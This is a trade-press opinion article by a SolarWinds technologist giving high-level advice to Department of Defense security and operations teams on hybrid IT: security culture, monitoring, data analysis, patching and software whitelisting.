Five Strategies for Security and Operations Success
Hybrid IT presents SecOps challenges.
The Department of Defense (DOD) has long been at the tip of the spear when it comes to successfully melding IT security and operations (SecOps). Over the past few decades, the DOD has shown consistent leadership through a commitment to bringing security awareness into just about every facet of its operations. The growing popularity of hybrid IT poses a challenge to the DOD’s well-honed approach to SecOps.
An increasing number of public sector agencies are moving at least some of their services and applications to the cloud, while continuing to maintain critical portions of their infrastructures onsite. This migration is driven by a desire for greater agility and cost efficiencies but is hampered by increased security concerns as agency teams grapple with items like the disconcerting concept of relinquishing control of their data to a third party, or documenting a system access list without knowing everyone behind the cloud provider’s infrastructure.
In this new hybrid IT world, it is more important than ever for SecOps teams to work together to maintain the balance between the need for greater speed and efficiencies and solid security. There are many ways to approach this challenge, but here are five strategies teams can employ to help ensure balance and maintain the DOD’s reputation as a model for SecOps success.
Foster an agency-wide commitment to high security standards.
The secure-by-design concept does not just apply to the creation of software; it must be a value shared by workers throughout the agency. Everyone, from the CIO on down, should be trained on the agency’s specific security protocols and committed to upholding the agency’s high security standards.
Additionally, SecOps teams must strengthen their already strong bonds. Hybrid IT environments can pose unique and never-before-seen challenges. This will require operations managers to work closely with information security officers to make quick decisions, based on the criticality of each incident, to mitigate potential threats. We’ve all heard the expressions, “Security is everyone’s responsibility” and, “Trust but verify.” We need to embrace these concepts in protection of our environments and data.
Establish clear visibility into hybrid IT environments.
Hybrid IT environments are, by their nature, highly distributed, which can make it hard for teams to monitor their data and applications, especially if they are offsite. Consider the possibility that an agency’s virtual machine might be running on a tenant next to something that might be carrying the latest Spectre or Meltdown virus—and that SecOps teams might not even be aware that this is happening.
Gaining clear visibility into applications and data as they move on- and off-premises is essential. Therefore, agencies should employ next-generation monitoring capabilities that provide SecOps teams with the ability to monitor applications wherever they may be. Server and application monitors can also be used to ensure that they have established the appropriate network perimeters and to keep tabs on overall application performance for better quality of service. System and application monitors should be able to provide a complete environmental view to help identify recent and historic trends. If you have not properly baselined your systems, then you won’t be able to notice anomalies as easily.
Rely on data to identify potential security holes.
Data is the lifeblood of agency network operations, and SecOps teams can use that massive amount of information to their advantage. Historical event and network performance data being collected can help identify vulnerabilities that may exist within DOD networks.
This requires complete data visualization across all networking components, whether they exist on-site or off. Teams should be able to select different sets of metrics of their choice—for example, dates, network traffic, etc., and easily view activity spikes or anomalies that correspond to those metrics. A graphical representation of the overlaid data can help pinpoint potential issues that deserve immediate attention.
Stay patched and create a software inventory whitelist.
Many security holes can be avoided by simply keeping software up-to-date. Having a schedule can go a long way toward covering for any potential security flaws. Automated patch management systems also work well, as they can immediately patch any suspected vulnerabilities. Regardless of tools or strategy, software should be routinely updated to fortify it against the latest viruses and vulnerabilities. Ensure that you track the release of your patches, as not all developers and manufacturers follow a standard. Make certain you have a documented and tested plan and rollout strategy. The ease of an automated patch management system can quickly become your biggest nightmare if you haven’t done proper validation.
SecOps teams should also collaborate on the creation of a software inventory whitelist. While most government organizations already have a stringent list of approved vendors and regulations around the types of software they are allowed to use, the world of hybrid IT has introduced new players into the market. Many of those organizations offer innovative—and tempting—tools to consider. Teams should carefully research the software that is available to them and create a list of solutions that fit their criteria and agency security parameters. The NIST Guide to Application Whitelisting is a good starting point.
Hybrid IT is challenging the DOD to up its admirable SecOps game. The organization will need to make some strategic adjustments to overcome the challenges that hybrid IT poses, but doing so will undoubtedly yield beneficial results. Agencies will be able to reap the many benefits of hybrid IT while also improving their security postures. That is a win/win for both security and operations teams.
Paul Parker is chief technologist, federal and national government, at SolarWinds.